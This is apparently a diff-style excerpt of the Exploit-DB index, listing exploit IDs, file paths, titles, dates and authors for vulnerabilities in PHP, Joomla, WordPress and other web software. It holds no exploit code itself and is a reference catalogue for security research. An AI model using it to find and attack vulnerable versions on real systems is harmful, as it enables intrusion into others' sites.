-33217,exploits/php/webapps/33217.txt,"Joomla! Component com_pressrelease - 'id' SQL Injection",2009-09-10,Moudi,php,webapps, -33218,exploits/php/webapps/33218.txt,"Joomla! Component com_mediaalert - 'id' SQL Injection",2009-09-11,Moudi,php,webapps, -33219,exploits/php/webapps/33219.txt,"Planet 2.0 - HTML Injection",2009-09-11,"Steve Kemp",php,webapps, -33226,exploits/php/webapps/33226.txt,"Mega File Hosting Script 1.2 - 'emaillinks.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps, -33227,exploits/php/webapps/33227.txt,"TuttoPHP Morris Guestbook - 'view.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps, -33231,exploits/cgi/webapps/33231.txt,"Avaya Intuity Audix LX R1.1 - Multiple Remote Vulnerabilities",2009-09-18,pagvac,cgi,webapps, -33232,exploits/php/webapps/33232.txt,"MyBB 1.4.8 - 'search.php' SQL Injection",2009-09-19,$qL_DoCt0r,php,webapps, -33236,exploits/asp/webapps/33236.txt,"Maxwebportal 1.365 - 'forum.asp' SQL Injection",2009-09-22,OoN_Boy,asp,webapps, -33237,exploits/php/webapps/33237.txt,"Joomla! Component SportFusion 0.2.x - SQL Injection",2009-09-22,kaMtiEz,php,webapps, -33238,exploits/php/webapps/33238.txt,"Joomla! Component JoomlaFacebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps, -33239,exploits/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,php,webapps, -33240,exploits/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection",2009-09-22,OoN_Boy,php,webapps, -33241,exploits/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting",2009-09-22,OoN_Boy,php,webapps, -33242,exploits/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,php,webapps, -33345,exploits/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps, -33343,exploits/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps, -33344,exploits/php/webapps/33344.txt,"CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)",2009-11-10,"Andrew Horton",php,webapps, -33709,exploits/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injections",2010-03-05,"Maciej Gojny",php,webapps, -33247,exploits/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps, -33248,exploits/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps, -33249,exploits/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps, -33250,exploits/php/webapps/33250.txt,"Collabtive 1.2 - Persistent Cross-Site Scripting",2014-05-08,"Deepak Rathore",php,webapps, -33252,exploits/php/webapps/33252.txt,"Cobbler 2.4.x < 2.6.x - Local File Inclusion",2014-05-08,"Dolev Farhi",php,webapps, -33256,exploits/php/webapps/33256.txt,"e107 0.7.x - CAPTCHA Security Bypass / Cross-Site Scripting",2009-09-28,MustLive,php,webapps, -33262,exploits/php/webapps/33262.txt,"Interspire Knowledge Manager 5 - 'p' Directory Traversal",2009-09-29,"Infected Web",php,webapps, -33266,exploits/php/webapps/33266.txt,"Joomla! Component CB Resume Builder - 'group_id' SQL Injection",2009-10-05,kaMtiEz,php,webapps, -33267,exploits/php/webapps/33267.txt,"X-Cart Email Subscription - 'email' Cross-Site Scripting",2009-10-06,"Paulo Santos",php,webapps, -33268,exploits/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 - Multiple Cross-Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps, -33590,exploits/php/webapps/33590.txt,"Joomla! Component AutartiTarot - Directory Traversal",2010-02-01,B-HUNT3|2,php,webapps, -33342,exploits/php/webapps/33342.txt,"CuteNews 1.4.6 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-10,"Andrew Horton",php,webapps, -33281,exploits/php/webapps/33281.txt,"Achievo 1.x - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps, -33282,exploits/php/webapps/33282.txt,"Dream Poll 3.1 - '/index.php' Cross-Site Scripting / SQL Injection",2009-10-13,infosecstuff,php,webapps, -33284,exploits/multiple/webapps/33284.txt,"Pentaho BI 1.x - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps, -33317,exploits/php/webapps/33317.txt,"Alienvault Open Source SIEM (OSSIM) 4.6.1 - Authenticated SQL Injection (Metasploit)",2014-05-12,"Chris Hebert",php,webapps,443 -33286,exploits/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 - 'run?__report' Cross-Site Scripting",2009-10-14,"Michele Orru",java,webapps, -33287,exploits/php/webapps/33287.txt,"BloofoxCMS 0.3.5 - 'search' Cross-Site Scripting",2009-10-15,"drunken danish rednecks",php,webapps, -33288,exploits/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps, -33290,exploits/php/webapps/33290.txt,"Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps, -33291,exploits/php/webapps/33291.txt,"Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting",2009-10-15,"Andrea Fabrizi",php,webapps, -33292,exploits/jsp/webapps/33292.txt,"IBM Rational RequisitePro 7.10 - 'ReqWeb Help Feature ReqWebHelp/advanced/workingSet.jsp?Operation' Cross-Site Scripting",2009-10-15,IBM,jsp,webapps, -33293,exploits/jsp/webapps/33293.txt,"IBM Rational RequisitePro 7.10 - ReqWeb Help Feature 'ReqWebHelp/basic/searchView.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,IBM,jsp,webapps, -33294,exploits/php/webapps/33294.txt,"TBmnetCMS 1.0 - Cross-Site Scripting",2009-10-19,"drunken danish rednecks",php,webapps, -33295,exploits/php/webapps/33295.txt,"OpenDocMan 1.2.5 - 'add.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33296,exploits/php/webapps/33296.txt,"OpenDocMan 1.2.5 - 'toBePublished.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-21,"Amol Naik",php,webapps, -33297,exploits/php/webapps/33297.txt,"OpenDocMan 1.2.5 - 'index.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33298,exploits/php/webapps/33298.txt,"OpenDocMan 1.2.5 - 'admin.php?last_message' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33299,exploits/php/webapps/33299.txt,"OpenDocMan 1.2.5 - 'category.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33300,exploits/php/webapps/33300.txt,"OpenDocMan 1.2.5 - 'department.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33301,exploits/php/webapps/33301.txt,"OpenDocMan 1.2.5 - 'profile.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33302,exploits/php/webapps/33302.txt,"OpenDocMan 1.2.5 - 'rejects.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33303,exploits/php/webapps/33303.txt,"OpenDocMan 1.2.5 - 'search.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33304,exploits/php/webapps/33304.txt,"OpenDocMan 1.2.5 - 'user.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33305,exploits/php/webapps/33305.txt,"OpenDocMan 1.2.5 - 'view_file.php' Cross-Site Scripting",2009-10-21,"Amol Naik",php,webapps, -33307,exploits/php/webapps/33307.php,"RunCMS - 'forum' SQL Injection",2009-10-26,Nine:Situations:Group::bookoo,php,webapps, -33308,exploits/php/webapps/33308.txt,"Sahana 0.6.2 - 'mod' Local File Disclosure",2009-10-27,"Greg Miernicki",php,webapps, -33309,exploits/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Cross-Site Scripting",2009-10-26,blake,php,webapps, -33320,exploits/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Cross-Site Scripting",2009-11-02,blake,php,webapps, -33327,exploits/hardware/webapps/33327.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Information Disclosures",2014-05-12,"Luigi Vezzoso",hardware,webapps, -33341,exploits/php/webapps/33341.txt,"CuteNews 1.4.6 - 'from_date_day' Full Path Disclosure",2009-11-10,"Andrew Horton",php,webapps, -33330,exploits/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent Cross-Site Scripting",2014-05-12,"Dolev Farhi",windows,webapps,80 -33334,exploits/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 -33353,exploits/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 -33354,exploits/php/webapps/33354.txt,"PHD Help Desk 1.43 - 'area.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",php,webapps, -33355,exploits/php/webapps/33355.txt,"PHD Help Desk 1.43 - 'solic_display.php?q_registros' Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps, -33356,exploits/php/webapps/33356.txt,"PHD Help Desk 1.43 - 'area_list.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",php,webapps, -33357,exploits/php/webapps/33357.txt,"PHD Help Desk 1.43 - 'atributo.php?URL' Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps, -33358,exploits/php/webapps/33358.txt,"PHD Help Desk 1.43 - 'atributo_list.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,"Amol Naik",php,webapps, -33359,exploits/php/webapps/33359.txt,"PHD Help Desk 1.43 - 'caso_insert.php?URL' Cross-Site Scripting",2009-11-16,"Amol Naik",php,webapps, -33361,exploits/asp/webapps/33361.txt,"JiRo's (Multiple Products) - '/files/login.asp' Multiple SQL Injections",2009-11-17,blackenedsecurity,asp,webapps, -33362,exploits/php/webapps/33362.txt,"CubeCart 3.0.4/4.3.6 - 'ProductID' SQL Injection",2009-11-19,"Sangte Amtham",php,webapps, -33365,exploits/php/webapps/33365.txt,"WordPress Plugin WP-phpList 2.10.2 - 'unsubscribeemail' Cross-Site Scripting",2009-11-29,MustLive,php,webapps, -40345,exploits/php/webapps/40345.txt,"FreePBX 13.0.x < 13.0.154 - Unauthenticated Remote Command Execution",2016-09-07,i-Hmx,php,webapps, -33366,exploits/php/webapps/33366.txt,"WordPress Plugin Trashbin 0.1 - 'mtb_undelete' Cross-Site Scripting",2009-11-15,MustLive,php,webapps, -33367,exploits/php/webapps/33367.txt,"WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)",2009-11-24,MustLive,php,webapps, -33368,exploits/php/webapps/33368.html,"WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)",2009-11-24,MustLive,php,webapps, -33370,exploits/multiple/webapps/33370.html,"ElasticSearch - Remote Code Execution",2014-05-15,"Jeff Geiger",multiple,webapps, -33371,exploits/php/webapps/33371.txt,"WordPress Plugin WP-Cumulus 1.x - 'tagcloud.swf' Cross-Site Scripting",2009-11-09,MustLive,php,webapps, -33372,exploits/php/webapps/33372.html,"WordPress Plugin Fuctweb CapCC 1.0 CAPTCHA - Security Bypass",2009-11-13,MustLive,php,webapps, -33373,exploits/php/webapps/33373.txt,"WordPress Plugin Subscribe to Comments 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2009-11-16,MustLive,php,webapps, -33374,exploits/php/webapps/33374.txt,"Cacti 0.8.x - 'graph.php' Multiple Cross-Site Scripting Vulnerabilities",2009-11-21,"Moritz Naumann",php,webapps, -33375,exploits/php/webapps/33375.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Delete Function Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps, -33376,exploits/php/webapps/33376.pl,"klinza Professional CMS 5.0.1 - 'menulast.php' Local File Inclusion",2009-11-24,klinza,php,webapps, -33377,exploits/php/webapps/33377.txt,"Joomla! Component ProofReader 1.0 RC9 - Cross-Site Scripting",2009-11-16,MustLive,php,webapps, -33378,exploits/php/webapps/33378.txt,"Joomla! 1.5.x - 404 Error Page Cross-Site Scripting",2009-11-23,MustLive,php,webapps, -33380,exploits/php/webapps/33380.txt,"Power Phlogger 2.2.x - Cross-Site Scripting",2008-02-16,MustLive,php,webapps, -33381,exploits/php/webapps/33381.txt,"Content Module 0.5 for XOOPS - 'id' SQL Injection",2009-11-30,s4r4d0,php,webapps, -33382,exploits/php/webapps/33382.txt,"SmartMedia Module 0.85 Beta for XOOPS - 'categoryId' Cross-Site Scripting",2009-11-30,SoldierOfAllah,php,webapps, -33383,exploits/php/webapps/33383.txt,"Elxis - 'Filename' Directory Traversal",2009-11-30,cr4wl3r,php,webapps, -33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",php,webapps, -33389,exploits/php/webapps/33389.txt,"eGroupWare 1.8.006 - Multiple Vulnerabilities",2014-05-16,"High-Tech Bridge SA",php,webapps,80 -33390,exploits/php/webapps/33390.txt,"WordPress Plugin Yoast Google Analytics 3.2.4 - 404 Error Page Cross-Site Scripting",2009-12-04,intern0t,php,webapps, -33391,exploits/php/webapps/33391.txt,"Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting",2009-12-07,"aBo MoHaMeD",php,webapps, -33392,exploits/php/webapps/33392.txt,"Joomla! Component YOOtheme Warp5 - 'yt_color' Cross-Site Scripting",2009-12-04,andresg888,php,webapps, -33393,exploits/php/webapps/33393.txt,"Joomla! Component You!Hostit! 1.0.1 Template - Cross-Site Scripting",2009-12-04,andresg888,php,webapps, -33394,exploits/php/webapps/33394.txt,"Invision Power Board 3.0.3 - '.txt' MIME-Type Cross-Site Scripting",2009-12-09,Xacker,php,webapps, -33396,exploits/php/webapps/33396.txt,"Zeeways ZeeJobsite - 'basic_search_result.php' Cross-Site Scripting",2009-12-10,bi0,php,webapps, -33400,exploits/php/webapps/33400.txt,"Ez Cart - 'sid' Cross-Site Scripting",2009-12-14,anti-gov,php,webapps, -33435,exploits/php/webapps/33435.txt,"ClarkConnect Linux 5.0 - 'proxy.php' Cross-Site Scripting",2009-12-22,"Edgard Chammas",php,webapps, -33436,exploits/php/webapps/33436.txt,"PHP-Calendar 1.1 - 'update08.php?configfile' Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps, -33437,exploits/php/webapps/33437.txt,"PHP-Calendar 1.1 - 'update10.php?configfile' Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps, -33438,exploits/multiple/webapps/33438.txt,"webMathematica 3 - 'MSP' Script Cross-Site Scripting",2009-12-23,"Floyd Fuh",multiple,webapps, -33439,exploits/php/webapps/33439.txt,"MyBB 1.4.10 - 'myps.php' Cross-Site Scripting",2009-12-24,"Steven Abbagnaro",php,webapps, -33440,exploits/php/webapps/33440.txt,"Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion",2009-12-29,F10riX,php,webapps, -33441,exploits/php/webapps/33441.txt,"Joomla! Component Joomulus 2.0 - 'tagcloud.swf' Cross-Site Scripting",2009-12-28,MustLive,php,webapps, -33442,exploits/php/webapps/33442.txt,"FreePBX 2.5.2 - '/admin/config.php?tech' Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps, -33443,exploits/php/webapps/33443.txt,"FreePBX 2.5.2 - Zap Channel Addition Description Parameter Cross-Site Scripting",2009-12-28,Global-Evolution,php,webapps, -33445,exploits/php/webapps/33445.txt,"PHPInstantGallery 1.1 - 'admin.php' Cross-Site Scripting",2009-12-26,indoushka,php,webapps, -33446,exploits/php/webapps/33446.txt,"Barbo91 - 'upload.php' Cross-Site Scripting",2009-12-25,indoushka,php,webapps, -33447,exploits/php/webapps/33447.php,"FreeWebShop 2.2.9 R2 - Multiple Remote Vulnerabilities",2009-12-29,"Akita Software Security",php,webapps, -33448,exploits/php/webapps/33448.txt,"AzDGDatingMedium 1.9.3 - 'l' Multiple Cross-Site Scripting Vulnerabilities",2009-12-29,indoushka,php,webapps, -33449,exploits/php/webapps/33449.txt,"PHPMyCart 1.3 - Cross-Site Scripting / Authentication Bypass",2009-12-31,indoushka,php,webapps, -33450,exploits/php/webapps/33450.txt,"SendStudio 4.0.1 - Cross-Site Scripting / Security Bypass",2009-12-31,indoushka,php,webapps, -33451,exploits/php/webapps/33451.txt,"BosClassifieds 1.20 - 'recent.php' Cross-Site Scripting",2009-12-31,indoushka,php,webapps, -33452,exploits/php/webapps/33452.txt,"Imagevue r16 - 'amount' Cross-Site Scripting",2009-12-31,indoushka,php,webapps, -33455,exploits/hardware/webapps/33455.txt,"Binatone DT 850W Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities",2014-05-21,"Samandeep Singh",hardware,webapps, -33456,exploits/php/webapps/33456.txt,"StarDevelop Live Help 2.6 - 'SERVER' Multiple Cross-Site Scripting Vulnerabilities",2009-12-31,indoushka,php,webapps, -33457,exploits/php/webapps/33457.txt,"PhotoKorn 1.542 - Cross-Site Scripting / Remote File Inclusion",2009-12-31,indoushka,php,webapps, -33458,exploits/php/webapps/33458.txt,"Discuz! 1.0 - 'referer' Cross-Site Scripting",2009-12-31,indoushka,php,webapps, -33459,exploits/php/webapps/33459.txt,"DieselPay 1.6 - Cross-Site Scripting / Directory Traversal",2009-12-31,indoushka,php,webapps, -33460,exploits/php/webapps/33460.txt,"Reamday Enterprises Magic News Plus 1.0.2 - Cross-Site Scripting",2010-01-01,indoushka,php,webapps, -33461,exploits/php/webapps/33461.txt,"PHPCart 3.1.2 - 'search.php' Cross-Site Scripting",2010-01-01,indoushka,php,webapps, -33462,exploits/php/webapps/33462.txt,"VirtuaSystems VirtuaNews Pro 1.0.4 - 'admin.php' Cross-Site Scripting",2010-01-01,indoushka,php,webapps, -33463,exploits/php/webapps/33463.txt,"VisionGate 1.6 - 'login.php' Cross-Site Scripting",2010-01-01,indoushka,php,webapps, -33464,exploits/php/webapps/33464.txt,"Discuz! 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-03,indoushka,php,webapps, -33465,exploits/php/webapps/33465.txt,"SLAED CMS 2.0 - 'stop' Cross-Site Scripting",2010-01-03,indoushka,php,webapps, -33466,exploits/php/webapps/33466.txt,"pL-PHP 0.9 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps, -33467,exploits/php/webapps/33467.txt,"WMNews - '/admin/wmnews.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps, -33468,exploits/php/webapps/33468.txt,"MercuryBoard 1.1.5 - 'index.php' Cross-Site Scripting",2010-01-04,indoushka,php,webapps, -33469,exploits/php/webapps/33469.txt,"LXR 0.9.x - Cross Referencer Multiple Cross-Site Scripting Vulnerabilities",2010-01-05,"Dan Rosenberg",php,webapps, -33470,exploits/php/webapps/33470.txt,"LineWeb 1.0.5 - Multiple Remote Vulnerabilities",2010-01-05,"Ignacio Garrido",php,webapps, -33473,exploits/php/webapps/33473.txt,"Roundcube Webmail 0.2 - Cross-Site Scripting",2010-01-06,"j4ck & Globus",php,webapps, -33474,exploits/php/webapps/33474.txt,"Joomla! Component DM Orders - 'id' SQL Injection",2010-01-07,NoGe,php,webapps, -33475,exploits/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injections / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps, -33478,exploits/php/webapps/33478.txt,"Joomla! Component Jobads - 'type' SQL Injection",2010-01-08,N0KT4,php,webapps, -33482,exploits/php/webapps/33482.txt,"DigitalHive - 'mt' Cross-Site Scripting",2010-01-10,ViRuSMaN,php,webapps, -33484,exploits/php/webapps/33484.txt,"DELTAScripts PHP Links 1.0 - 'email' Cross-Site Scripting",2010-01-11,Crux,php,webapps, -33485,exploits/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Cross-Site Scripting",2010-01-11,Crux,php,webapps, -33486,exploits/php/webapps/33486.txt,"@lex Guestbook 5.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"D3V!L FUCKER",php,webapps, -33487,exploits/php/webapps/33487.txt,"PHPepperShop 2.5 - 'USER_ARTIKEL_HANDLING_AUFRUF.php' Cross-Site Scripting",2010-01-12,Crux,php,webapps, -33488,exploits/php/webapps/33488.txt,"Active Calendar 1.2 - '$_SERVER['PHP_SELF']' Multiple Cross-Site Scripting Vulnerabilities",2010-01-11,"Martin Barbella",php,webapps, -33493,exploits/multiple/webapps/33493.txt,"Mayan-EDms Web-Based Document Management OS System - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-05-24,"Dolev Farhi",multiple,webapps, -33494,exploits/cgi/webapps/33494.txt,"Web Terra 1.1 - 'books.cgi' Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps, -33582,exploits/php/webapps/33582.txt,"Joomla! Component com_rsgallery2 2.0 - 'catid' SQL Injection",2010-01-31,snakespc,php,webapps, -33505,exploits/php/webapps/33505.txt,"Docmint 1.0/2.1 - 'id' Cross-Site Scripting",2010-01-12,Red-D3v1L,php,webapps, -33507,exploits/php/webapps/33507.txt,"Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting",2010-01-12,Sora,php,webapps, -33509,exploits/php/webapps/33509.txt,"Joomla! Component com_tienda - 'categoria' Cross-Site Scripting",2010-01-13,FL0RiX,php,webapps, -33510,exploits/php/webapps/33510.txt,"Tribisur - 'cat' Cross-Site Scripting",2010-01-13,ViRuSMaN,php,webapps, -33511,exploits/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injections",2010-01-14,"nGenuity Information Services",multiple,webapps, -33514,exploits/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injections",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 -33646,exploits/php/webapps/33646.txt,"Joomla! Component MS Comment 0.8.0b - Security Bypass / Cross-Site Scripting",2009-12-31,"Jeff Channell",php,webapps, -33518,exploits/hardware/webapps/33518.txt,"ZYXEL P-660HW-T1 3 Wireless Router - Cross-Site Request Forgery",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 -33520,exploits/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 -33574,exploits/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps, -33575,exploits/cfm/webapps/33575.txt,"CommonSpot Server - '/utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps, -33526,exploits/php/webapps/33526.txt,"Technology for Solutions 1.0 - 'id' Cross-Site Scripting",2010-01-14,PaL-D3v1L,php,webapps, -33528,exploits/php/webapps/33528.txt,"Xforum 1.4 - 'nbpageliste' Cross-Site Scripting",2010-01-14,ViRuSMaN,php,webapps, -33529,exploits/php/webapps/33529.txt,"Joomla! Component com_marketplace 1.2 - 'catid' Cross-Site Scripting",2010-01-14,ViRuSMaN,php,webapps, -33530,exploits/php/webapps/33530.txt,"LetoDms 1.4.x - 'lang' Local File Inclusion",2010-01-15,"D. Fabian",php,webapps, -33534,exploits/php/webapps/33534.txt,"TestLink 1.8.5 - 'order_by_login_dir' Cross-Site Scripting",2010-01-18,"Prashant Khandelwal",php,webapps, -33636,exploits/php/webapps/33636.sh,"Interspire Knowledge Manager 5 - 'callback.snipshot.php' Arbitrary File Creation",2010-02-03,"Cory Marsh",php,webapps, -33637,exploits/php/webapps/33637.txt,"Joomla! Component Webee Comments 1.1/1.2 - 'index2.php' articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps, -33638,exploits/php/webapps/33638.txt,"Joomla! Component Webee Comments 1.1/1.2 - Multiple BBCode Tags Cross-Site Scripting Vulnerabilities",2009-11-15,"Jeff Channell",php,webapps, -33639,exploits/php/webapps/33639.txt,"Joomla! Component EasyBook 2.0.0rc4 - Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps, -33634,exploits/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",php,webapps, -33541,exploits/php/webapps/33541.txt,"DataLife Engine 8.3 - '/engine/inc/include/init.php?selected_language' Remote File Inclusion",2010-01-19,indoushka,php,webapps, -33542,exploits/php/webapps/33542.txt,"DataLife Engine 8.3 - '/engine/inc/help.php?config[langs]' Remote File Inclusion",2010-01-19,indoushka,php,webapps, -33543,exploits/php/webapps/33543.txt,"DataLife Engine 8.3 - '/engine/ajax/pm.php?config[lang]' Remote File Inclusion",2010-01-19,indoushka,php,webapps, -33544,exploits/php/webapps/33544.txt,"DataLife Engine 8.3 - '/engine/ajax/addcomments.php?_REQUEST[skin]' Remote File Inclusion",2010-01-19,indoushka,php,webapps, -33545,exploits/php/webapps/33545.txt,"Easysitenetwork Jokes Complete Website - 'id' Cross-Site Scripting",2010-01-18,indoushka,php,webapps, -33546,exploits/php/webapps/33546.txt,"Easysitenetwork Jokes Complete Website - 'searchingred' Cross-Site Scripting",2010-01-18,indoushka,php,webapps, -33547,exploits/php/webapps/33547.pl,"vBulletin 4.0.1 - 'misc.php' SQL Injection",2010-01-18,indoushka,php,webapps, -33550,exploits/php/webapps/33550.txt,"VisualShapers EZContents 2.0.3 - Authentication Bypass / Multiple SQL Injections",2010-01-19,"AmnPardaz Security Research Team",php,webapps, -33551,exploits/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' SQL Injection",2010-01-20,Ctacok,php,webapps, -33555,exploits/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps, -33557,exploits/php/webapps/33557.txt,"Sharetronix 3.3 - Multiple Vulnerabilities",2014-05-28,"High-Tech Bridge SA",php,webapps,80 -33558,exploits/php/webapps/33558.txt,"cPanel and WHM 11.25 - 'failurl' HTTP Response Splitting",2010-01-21,Trancer,php,webapps, -33561,exploits/php/webapps/33561.txt,"OpenX 2.6.1 - SQL Injection",2010-01-22,AndySoon,php,webapps, -33564,exploits/jsp/webapps/33564.txt,"Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities",2009-10-24,aScii,jsp,webapps, -40752,exploits/php/webapps/40752.py,"InvoicePlane 1.4.8 - Password Reset",2016-11-11,feedersec,php,webapps, -33566,exploits/php/webapps/33566.txt,"Joomla! Component 3D Cloud - 'tagcloud.swf' Cross-Site Scripting",2010-01-26,MustLive,php,webapps, -33586,exploits/php/webapps/33586.txt,"Joomla! Component com_gambling - 'gamblingEvent' SQL Injection",2010-02-01,md.r00t,php,webapps, -33595,exploits/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps, -33596,exploits/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps, -33597,exploits/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting",2010-02-04,s4r4d0,php,webapps, -33602,exploits/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps, -33603,exploits/php/webapps/33603.html,"LANDesk Management Gateway 4.x - Multiple Vulnerabilities",2010-02-05,"Aureliano Calvo",php,webapps, -33605,exploits/php/webapps/33605.php,"ASCET Interactive Huski CMS - 'i' Local File Inclusion",2010-02-05,Wireghoul,php,webapps, -33606,exploits/php/webapps/33606.txt,"ASCET Interactive Huski Retail - Multiple SQL Injections",2010-02-05,Wireghoul,php,webapps, -33613,exploits/php/webapps/33613.txt,"WordPress Plugin Participants Database 1.5.4.8 - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 -33617,exploits/php/webapps/33617.txt,"Aflam Online 1.0 - 'index.php' SQL Injection",2010-02-08,alnjm33,php,webapps, -33618,exploits/php/webapps/33618.txt,"Zen Time Tracking 2.2 - Multiple SQL Injections",2010-02-08,cr4wl3r,php,webapps, -33619,exploits/php/webapps/33619.txt,"VideoDB 3.0.3 - 'login.php' Cross-Site Scripting",2010-02-08,vr,php,webapps, -33621,exploits/php/webapps/33621.txt,"vBulletin Adsense Component - 'viewpage.php' SQL Injection",2010-02-09,JIKO,php,webapps, -33624,exploits/php/webapps/33624.txt,"vBulletin 3.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps, -33626,exploits/php/webapps/33626.txt,"PHPBTTracker+ 2.2 - SQL Injection",2014-06-03,"BackBox Linux Team",php,webapps,80 -33627,exploits/ios/webapps/33627.txt,"NG WifiTransfer Pro 1.1 - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8080 -33628,exploits/ios/webapps/33628.txt,"Files Desk Pro 1.4 iOS - Local File Inclusion",2014-06-03,Vulnerability-Lab,ios,webapps,8081 